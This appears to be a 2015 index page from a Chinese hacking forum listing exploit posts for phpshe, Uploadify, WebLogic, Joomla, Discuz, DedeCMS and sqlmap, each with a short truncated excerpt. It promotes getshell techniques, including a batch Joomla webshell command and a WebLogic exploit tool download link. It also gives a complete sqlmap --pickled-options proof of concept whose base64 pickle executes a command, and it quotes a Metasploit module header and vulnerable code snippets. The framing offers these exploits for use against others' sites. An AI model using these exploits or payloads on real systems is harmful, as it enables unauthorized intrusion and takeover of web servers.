• phpshe后台任意文件删除(后台无限制拿shell)

    phpshe后台任意文件删除(后台无限制拿shell)
    90sec@Joseph case 'del':         pe_token_match();         $tpl_name = pe_dbhold($_g_tpl);         if ($tpl_name == 'default') pe_error('默认模板不能删除...');         if ($db->pe_num('setting', array('setting_key'=>'web_tpl', 'setting_value'=>$tpl_name))) {                 pe_error('模板正在使用中...');         }         else { ...
    作者:unhonker| 发布:2015年12月28日 | 分类:漏洞公布 | 被撸:2,364次| 标签:
  • 某p2p getshell

    某p2p getshell
    原作者:Joseph 这个漏洞有点鸡肋,毕竟牛逼的无限制的getshell肯定是给人家找我挖洞的。 <?php /* Uploadify     // Define a destination $targetFolder = '/uploads'; // Relative to the root   $verifyToken = md5('unique_salt' . $_POST['timestamp']);   if (!empty($_FILES) && $_POST['token'] == $verifyToken) {     $tempFile = $_FILES[...
    作者:unhonker| 发布:2015年12月26日 | 分类:漏洞公布 | 被撸:2,209次| 标签:
  • weblogic反序列化漏洞利用工具

    weblogic反序列化漏洞利用工具
    本文原创作者:rebeyond 额,文章有点长我就没转载过来,有兴趣的可以进行抓包看下。 这个东西,我是在本机试过的,可用。 工具下载: http://pan.baidu.com/s/1pKwlNWv 提取密码: twjd
    作者:unhonker| 发布:2015年12月23日 | 分类:漏洞公布 | 被撸:6,108次| 标签:
  • JOOMLA 1.5 – 3.4.5 远程代码执行之批量GETSHELL

    JOOMLA 1.5 – 3.4.5 远程代码执行之批量GETSHELL
    @安全小飞侠 0X01 背景 近日,Joomla 1.5 – 3.4.5爆出了一个远程代码执行的漏洞,此洞可谓影响相当之大,各个安全机构都发布了漏洞的分析报告和POC,笔者就不在此赘述了 执行命令python hackUtils.py -r [url文件]一键获取webshell: hackUtils-master
    作者:unhonker| 发布:2015年12月17日 | 分类:漏洞公布 | 被撸:6,037次| 标签:
  • Joomla远程代码执行详解

    Joomla远程代码执行详解
    朋友在群里发来的消息。 关于今天最新爆出的joomla 0day,经360研究人员分析发现,此为session 反序列代码执行高危漏洞。 代码分析: 此漏洞为session存储机制带来的安全隐患,在php中session是通过序列化存储的,且存储方式有:php、php_binary(php>5.44用php_serialize)、 wddx PHP默认安装设置session.serialize_handler的值是php,因此seesion的序列化格式为: 键名 + ...
    作者:unhonker| 发布:2015年12月15日 | 分类:漏洞公布 | 被撸:2,795次| 标签:
  • sqlmap代码执行漏洞

    sqlmap代码执行漏洞
    这个漏洞今天在微博上传的比较火。。。。。 下面给出相关POC sqlmap.py -u "http://www.ihonker.org/s?wd=sqli" --pickled-options "Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKFMnY2FsYy5leGUnCnAyCnRwMwpScDQKLg==" base64解码 csubprocessPopenp1(S'calc.exe'p2tp3Rp4. 视频 http://video.weibo.com/player/1034:4cbd333b0bf3af1de46ea99660b9a8b5/v.swf
    作者:unhonker| 发布:2015年12月09日 | 分类:漏洞公布 | 被撸:2,031次| 标签:
  • Joomla SQL注入和远程代码执行漏洞

    Joomla SQL注入和远程代码执行漏洞
    发布日期:2015.11.21 通杀版本:3.2——3.4.4 CVE-2015-7297 CVE-2015-7857 CVE-2015-7858 相关Exp见代码 ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote   Rank = ExcellentRanking     inc...
    作者:unhonker| 发布:2015年11月21日 | 分类:漏洞公布 | 被撸:3,487次| 标签:,
  • DZ 6.x getshell [20151117]

    DZ 6.x getshell [20151117]
    网上有dz 7.x和dz x系列的uc_key 利用方式,今天遇到了一个dz6.0的网站,于是分析了下代码,改了下利用程序,分享给需要的人。uc_key getshell 是一个影响比较广存在比较久的漏洞,基本上使用ucenter做用户中心的程序都可以使用,但需要根据特定程序写特定利用。最新版本的dz好像是修补了,没有具体看代码了。 ps:需要或者感觉不错的请挥挥你的小手 点击 “顶” 注意三个地...
    作者:unhonker| 发布:2015年11月17日 | 分类:漏洞公布 | 被撸:3,188次| 标签:
  • DEDECMS 20150618 注入一枚(过防注入\可注入管理员账户)

    DEDECMS 20150618 注入一枚(过防注入\可注入管理员账户)
    作者:′雨。 首先来看一下 function XSSClean($val) {[/align]     global $cfg_soft_lang;      if($cfg_soft_lang=='gb2312') gb2utf8($val);      if (is_array($val))      {          while (list($key) = each($val))          {              if(in_array($key,array('tags','body','dede_fields','dede_addonfields','dopost','introduce'))) continue;     ...
    作者:unhonker| 发布:2015年10月10日 | 分类:漏洞公布 | 被撸:4,495次| 标签: